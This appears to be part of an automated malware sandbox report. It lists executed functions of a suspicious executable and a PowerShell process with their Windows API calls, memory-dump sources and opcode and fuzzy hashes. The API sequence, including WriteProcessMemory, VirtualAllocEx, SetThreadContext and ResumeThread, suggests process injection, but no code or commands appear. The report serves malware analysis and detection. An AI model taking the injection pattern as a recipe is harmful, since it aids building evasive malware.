                                                        • Instruction Fuzzy Hash: 02D052343017818FDB2ACA1CC2D4F5973E8AF80B08F0644E8BC008B266C3A8E880EA00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2612 Parent PID: 1388 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCOMMON

                                                        Executed Functions

                                                        Function 00263B30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00263BB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID: I-
                                                        • API String ID: 983334009-633191110
                                                        • Opcode ID: 526db05dddce16c2c6c30363f3103c541e87217b02c10384683597661c596cdb
                                                        • Instruction ID: 8239e03e5471fcdbb818efcec1d59181f761e3f339584b27ae6e0f54d57ab854
                                                        • Opcode Fuzzy Hash: 526db05dddce16c2c6c30363f3103c541e87217b02c10384683597661c596cdb
                                                        • Instruction Fuzzy Hash: 2C216A75D002098FDB10CFAAC4847EEBBF4AF48318F14882ED819A7240DB789A84CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00261888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002618A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002618BA
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        • Opcode ID: 365d6c10ddfdfeb0e0fcd3964f6f8e8034ee68e2f3e7d895c1ba2fd8f1f51000
                                                        • Instruction ID: a98f7b532f2531d4cdb3fc3d7ec7b6c618df4be4a4e7259b01c22ed4cd3df88e
                                                        • Opcode Fuzzy Hash: 365d6c10ddfdfeb0e0fcd3964f6f8e8034ee68e2f3e7d895c1ba2fd8f1f51000
                                                        • Instruction Fuzzy Hash: BCE04F70E00208CFC744EFA8EA4451E7BF0FB49304B5045AAC809D7B84E7305EA1CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00264B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00264D8E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 3c891ec71a467a14365e050fef729e9f0add55aeb31c3e0257bf92189f1155e4
                                                        • Instruction ID: b2bb010c9e6820403d09414f9d34ca4ab21fe77deedbfd9bd56ebeb9bf154665
                                                        • Opcode Fuzzy Hash: 3c891ec71a467a14365e050fef729e9f0add55aeb31c3e0257bf92189f1155e4
                                                        • Instruction Fuzzy Hash: 2B917A71D10619CFDF20DFA8C881BEEBBB2BF48314F14856AD848A7280DB759995CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002642D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00264360
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 93664e75e892b9d738448f9b81992fd3640dd00fd236560417a7ecfea84321ab
                                                        • Instruction ID: 2570e83c12d9d6ad91f59312033c76ac67b3eaf77395b52c7e16eafebbde4f10
                                                        • Opcode Fuzzy Hash: 93664e75e892b9d738448f9b81992fd3640dd00fd236560417a7ecfea84321ab
                                                        • Instruction Fuzzy Hash: 352139759003199FCB10DFA9C885BDEBBF5FF48314F10882AE959A7340D7789A54CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002645B9, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00264640
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 6ef6086f5f66bd83bdd1370307f073285b2c8af513c874a03e8cbf2af149211a
                                                        • Instruction ID: cdc00379043891c689e9772410f739b991621ae2d2e1f96e9803dad84cf64824
                                                        • Opcode Fuzzy Hash: 6ef6086f5f66bd83bdd1370307f073285b2c8af513c874a03e8cbf2af149211a
                                                        • Instruction Fuzzy Hash: 6B2148B5C006099FCB10CFA9C884BEEFBF5BF48314F50892EE559A7240D7789A40CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002645C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00264640
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 39a8caa626e476dd7bcbb51b920b18d05975ada45b482c46e704c9dfcd0f1148
                                                        • Instruction ID: 6070c2de3706ee138d9630e9a136c07b8d03c48fc838916a7862782c83b08dcf
                                                        • Opcode Fuzzy Hash: 39a8caa626e476dd7bcbb51b920b18d05975ada45b482c46e704c9dfcd0f1148
                                                        • Instruction Fuzzy Hash: AB213971D002099FCB10CFA9C884BEEFBF5FF48314F50882AE559A7240D7789950CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00263B38, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00263BB6
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 7b2eea4fc1b4ee412ddfa9cc3dbcf09c4dc592b756b9924fab6e92b3d300990f
                                                        • Instruction ID: c93edea78f32f61c89f9984979373a2f7382a5a91cb98fa87d248096542b5bf2
                                                        • Opcode Fuzzy Hash: 7b2eea4fc1b4ee412ddfa9cc3dbcf09c4dc592b756b9924fab6e92b3d300990f
                                                        • Instruction Fuzzy Hash: 0E214C71D002098FDB10CFA9C4847EEBBF4EF49318F54882AD519A7240DB789A84CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00264010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0026407E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 50e62ef53b54bbca46a4b6cbfd117b69ff0cda0e567a7d6fb9d54658217628c5
                                                        • Instruction ID: 9764c3261ac85e8952eda17d73ec9fdee87339fd0bf8990fb227baef9cbff7a4
                                                        • Opcode Fuzzy Hash: 50e62ef53b54bbca46a4b6cbfd117b69ff0cda0e567a7d6fb9d54658217628c5
                                                        • Instruction Fuzzy Hash: 8F1167759002099FCB10CFA9C844BDEBBF9AF48314F10881AD619A7210C775AA50CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00265590, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 06d7b55f3ff1c6216aae8379284c64adf78c995ed7cdfc250f967ec8fa12a801
                                                        • Instruction ID: 6eb1560917bafaf1953ae058e1023f2a4893cb8715246ae06edd2e086e68c457
                                                        • Opcode Fuzzy Hash: 06d7b55f3ff1c6216aae8379284c64adf78c995ed7cdfc250f967ec8fa12a801
                                                        • Instruction Fuzzy Hash: 6B115BB5D006498FDB10CFA9D4447EEFBF5AF88314F24881AC515A7640D7749644CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00265598, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3b06d07570c89a135f665c9f2b084dabc61369d8eabf85b68593c56134ccb454
                                                        • Instruction ID: 93cac593d6dbad928a5ea8576bef0ab0892fd9ef526bcbc889f69cb94258e1b4
                                                        • Opcode Fuzzy Hash: 3b06d07570c89a135f665c9f2b084dabc61369d8eabf85b68593c56134ccb454
                                                        • Instruction Fuzzy Hash: 0D113A75D006098FDB10CFAAC8447EEFBF9AF88324F14881AC519A7240DB74A944CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165069549.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 945ca2349ccf45ec000c79f4cdf5ecb65c64e5b0b1502d552c3a86817a93559d
                                                        • Instruction ID: 7113352ddac43dc471057b6665bcd7f56ca8c21e13557e0c268b43a327fdb21f
                                                        • Opcode Fuzzy Hash: 945ca2349ccf45ec000c79f4cdf5ecb65c64e5b0b1502d552c3a86817a93559d
                                                        • Instruction Fuzzy Hash: C621D075604208DFCB14DF24E884B26BB75EF84314F24C9A9E80E4B346C33AD857CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165069549.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1576f5cc496836212dbfe52cb5ef9de5f4dd39319ca20221a996a3bbda28dfe6
                                                        • Instruction ID: 7354fecb4b8952bac474bf0c955f4de1042dd223a0c33e3125d8cfa937491ff0
                                                        • Opcode Fuzzy Hash: 1576f5cc496836212dbfe52cb5ef9de5f4dd39319ca20221a996a3bbda28dfe6
                                                        • Instruction Fuzzy Hash: D9215B755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2160 Parent PID: 2888 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01D5ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 563ba4a1919b931cdd908b4d249df672f62e9d51bf163d94408e6e6d4cccb680
                                                        • Instruction ID: a49af0a019332a4592b224417c263479d891c8382d571b1c7bfcf07252a2b98f
                                                        • Opcode Fuzzy Hash: 563ba4a1919b931cdd908b4d249df672f62e9d51bf163d94408e6e6d4cccb680
                                                        • Instruction Fuzzy Hash: FF21BF765097809FEB238F29DC44B92BFB4EF06310F08859AED858B163D2319908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: ce56d0617f967bbb80e6ae74fd6b549ea86b267056ed132b7ae5a3ea783d15d3
                                                        • Instruction ID: 5ea6a6754c1b1a212ae115f885c56d512784d025793434ea9965150c37b051c2
                                                        • Opcode Fuzzy Hash: ce56d0617f967bbb80e6ae74fd6b549ea86b267056ed132b7ae5a3ea783d15d3
                                                        • Instruction Fuzzy Hash: 3411A075500700DFEF61DF59D884B96FBE4EF08221F08C56AED4A8B662E731E414CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: fd03bf0081d487ed1823c86c4a6bc0135f2040a4b623bb93136b52452ddf5f22
                                                        • Instruction ID: 1a5ae137baebf0704471598b0bfaeb6085c43731dd81eaa6a3d45fc401977b31
                                                        • Opcode Fuzzy Hash: fd03bf0081d487ed1823c86c4a6bc0135f2040a4b623bb93136b52452ddf5f22
                                                        • Instruction Fuzzy Hash: 5211A071508380AFDB228F15DC45F52FFB4EF4A220F09849AED854B663C275A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 9a78a59aa2f5b4e67388195d39d06dc8cc16fa051a3790c8f2c98f16ea83cc9b
                                                        • Instruction ID: eaeec67850c25cf85ea8b1aea049403f5385958f0007ff155d3aa2a7a0a747c4
                                                        • Opcode Fuzzy Hash: 9a78a59aa2f5b4e67388195d39d06dc8cc16fa051a3790c8f2c98f16ea83cc9b
                                                        • Instruction Fuzzy Hash: 7901AD31400700DFEF618F09D885B21FFA0EF08721F08C49ADD891B662C271E418DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: dd044d63d67811ca169a9028d4efb87f462620fdb0ef27dda84e655403734220
                                                        • Instruction ID: 145e58c6a2e4ca490d91737a676a8cbd3229e9617fad8d4d9e8d11b3363617b5
                                                        • Opcode Fuzzy Hash: dd044d63d67811ca169a9028d4efb87f462620fdb0ef27dda84e655403734220
                                                        • Instruction Fuzzy Hash: 8631397650E3C09FEB138B759C65692BFB4AF47210F0E84DBD884CF1A3D6259809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 4f5b2c1c4004222bce884b98e2b5f8e565f41c8eac281ce539811401009aa8cd
                                                        • Instruction ID: b37d0d77b31ad01cfde3be53dedbea2f747acdbcf78d5902b854d8ae55c1aef6
                                                        • Opcode Fuzzy Hash: 4f5b2c1c4004222bce884b98e2b5f8e565f41c8eac281ce539811401009aa8cd
                                                        • Instruction Fuzzy Hash: FA316271509380AFEB22CF65CC85F56BFF8EF05210F09849EE9859B292D375A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: dd5d8ee6fc49303f81f1515c9c496904dd9428f618b5bcbf31bab36bdbb59373
                                                        • Instruction ID: ed00fe109edb3fe59f100633b10a53200d30fbc6c067f52d6fffd5ef3732cb00
                                                        • Opcode Fuzzy Hash: dd5d8ee6fc49303f81f1515c9c496904dd9428f618b5bcbf31bab36bdbb59373
                                                        • Instruction Fuzzy Hash: 4B319871509380AFE712CB25DC45B96BFE8DF06314F0884AAE944DF293D375A905CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: e53ceb34fe574f0022451ca588f50433b73cc8d0b999a92f57cf81b2924d33b0
                                                        • Instruction ID: 5c2d506f492fa0aaf00cff24246e907bf5cf9adc3335c06f16ea1137162cd2c2
                                                        • Opcode Fuzzy Hash: e53ceb34fe574f0022451ca588f50433b73cc8d0b999a92f57cf81b2924d33b0
                                                        • Instruction Fuzzy Hash: 59318471509384AFE712CB61DC55F96BFB8EF06210F08859BE985DB192D225A908C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: bc68fa6605d6f0bf06f385b4eb698bea50fdd2cfb6f30f0dd3f3e08beccb60fa
                                                        • Instruction ID: 9b0fc26c1c7d49118f28b43710ec8ca13164ebf8430f3ea6e00f11b2bb3ee460
                                                        • Opcode Fuzzy Hash: bc68fa6605d6f0bf06f385b4eb698bea50fdd2cfb6f30f0dd3f3e08beccb60fa
                                                        • Instruction Fuzzy Hash: 8A21D8B2509380AFEB12CF24DC45B96BFB8EF06320F0885DBE985DB193D2659945C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 04395b568d0864f9d7f1e9083d503dafb3a7561f2ca62e3616405a5545def96e
                                                        • Instruction ID: 7d4a339cb20f9c7dc38ac6430b2f6fc93a71fe80f3a68127c48f87d9c652ed97
                                                        • Opcode Fuzzy Hash: 04395b568d0864f9d7f1e9083d503dafb3a7561f2ca62e3616405a5545def96e
                                                        • Instruction Fuzzy Hash: F231917550E3C0AFD3138B358C55B56BFB4AF43610F1A81CBD884CF2A3D229A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 47e230352a85f64ce95868db5730295660820cf568e3d011943e6ce5c6f06a1a
                                                        • Instruction ID: 4f8c70866932ace30069c77a08d584c4c8ffe23e118c60989a105680efeb8e73
                                                        • Opcode Fuzzy Hash: 47e230352a85f64ce95868db5730295660820cf568e3d011943e6ce5c6f06a1a
                                                        • Instruction Fuzzy Hash: E5219171509380AFEB22CF15CC45FA6BFA8EF46220F08849BE945DB192D664A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A1A8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 66858844c5d3a60ea52d3475c5e24c35982415bb61504db50c3251d1779d352c
                                                        • Instruction ID: a042458fd261de42e7b273ab0e0d8dfc51ecbbc7e36b23c16d331457fda23586
                                                        • Opcode Fuzzy Hash: 66858844c5d3a60ea52d3475c5e24c35982415bb61504db50c3251d1779d352c
                                                        • Instruction Fuzzy Hash: C121C97144D3C06FD3128B258C55B66BFB4EF47620F0981DBDC848F293D325A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 2cc182f793117df936ff768223183abca4ff0a5bd9f885274fd446cf724cbc71
                                                        • Instruction ID: b0739f296ac5a94d91c2222740a29a0e7592e7909782a9da81a7d7cfff7ee2fe
                                                        • Opcode Fuzzy Hash: 2cc182f793117df936ff768223183abca4ff0a5bd9f885274fd446cf724cbc71
                                                        • Instruction Fuzzy Hash: FF21DAB6408780AFE712CB159C45FA3BFA8EF46720F0981DBF9858B193D224A905C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 63600ce5f5f4be861d2657e836b00db98561b398deaf2e63fa209f784214479f
                                                        • Instruction ID: 66a208a5acd46b94084268df37310aa3207f0e74b4c01817c8b62b2b77a04fc3
                                                        • Opcode Fuzzy Hash: 63600ce5f5f4be861d2657e836b00db98561b398deaf2e63fa209f784214479f
                                                        • Instruction Fuzzy Hash: F521717540E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3e6498446af1132d36505a361c35d9bdebe1c67e74913db8dbda5254bdd31e2e
                                                        • Instruction ID: d50e6aa69377c24356440673dd316259d56443b32668ea85b0927d9729af01ce
                                                        • Opcode Fuzzy Hash: 3e6498446af1132d36505a361c35d9bdebe1c67e74913db8dbda5254bdd31e2e
                                                        • Instruction Fuzzy Hash: 6E219071500704EFEB21DF65CD85F66FBE8EF08750F04846AE9499B291D771E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 4efbe6f555593c0436b04c7e8d127e6295a2e547052c8230300feeaf57afa7b4
                                                        • Instruction ID: 5ced42715e5a8fbc4956dbb2b0dad7e752ea18d7d5a62a6a4a6450075a1835b6
                                                        • Opcode Fuzzy Hash: 4efbe6f555593c0436b04c7e8d127e6295a2e547052c8230300feeaf57afa7b4
                                                        • Instruction Fuzzy Hash: DA219271409380AFE722CF61DC45F56BFB8EF46314F09859BE9449B193C265A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A8B4, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        • Opcode ID: ad443e8fb59ea295bf36ce3d766e3e2bd5ca9c7739f20cb039bcbe1ee3c4b8e3
                                                        • Instruction ID: 9d918cdae1c71e30d683671a26f1a0e6e70601c2558508bd7f225bbbbb5b7da9
                                                        • Opcode Fuzzy Hash: ad443e8fb59ea295bf36ce3d766e3e2bd5ca9c7739f20cb039bcbe1ee3c4b8e3
                                                        • Instruction Fuzzy Hash: F321957540D780AFD3138B259C51B62BFB4EF87720F0981DBE8848B653D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
